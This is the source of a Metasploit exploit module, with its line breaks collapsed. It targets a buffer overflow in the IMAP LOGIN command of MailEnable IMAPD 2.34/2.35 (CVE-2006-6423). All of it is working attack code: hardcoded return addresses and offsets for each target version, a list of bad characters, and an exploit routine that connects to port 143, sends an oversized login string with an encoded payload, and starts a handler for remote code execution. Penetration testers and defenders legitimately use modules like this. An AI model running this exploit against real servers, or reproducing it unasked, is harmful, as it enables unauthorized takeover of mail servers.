## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super( update_info( info, 'Name' => 'MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow', 'Description' => %q{ MailEnable's IMAP server contains a buffer overflow vulnerability in the Login command. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2006-6423'], [ 'OSVDB', '32125'], [ 'BID', '21492'] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 450, 'BadChars' => "\x00\x0a\x0d\x20", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'MailEnable 2.35 Pro', { 'Ret' => 0x10049abb, } ], # MEAISP.DLL [ 'MailEnable 2.34 Pro', { 'Ret' => 0x76095d68, 'Offset' => 556, } ], # push esp # ret | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ], 'DisclosureDate' => '2006-12-11', 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_options([ Opt::RPORT(143) ]) end def exploit connect auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n" sploit = rand_text_alpha_upper(556) + [target.ret].pack('V') sploit << payload.encoded + "\r\n\r\n" res = sock.recv(50) if (res =~ / OK IMAP4rev1/) print_status("Trying target #{target.name}...") sock.put(auth) sock.get_once(-1, 3) sock.put(sploit) else print_status("Not running IMAP4rev1...") end handler disconnect end end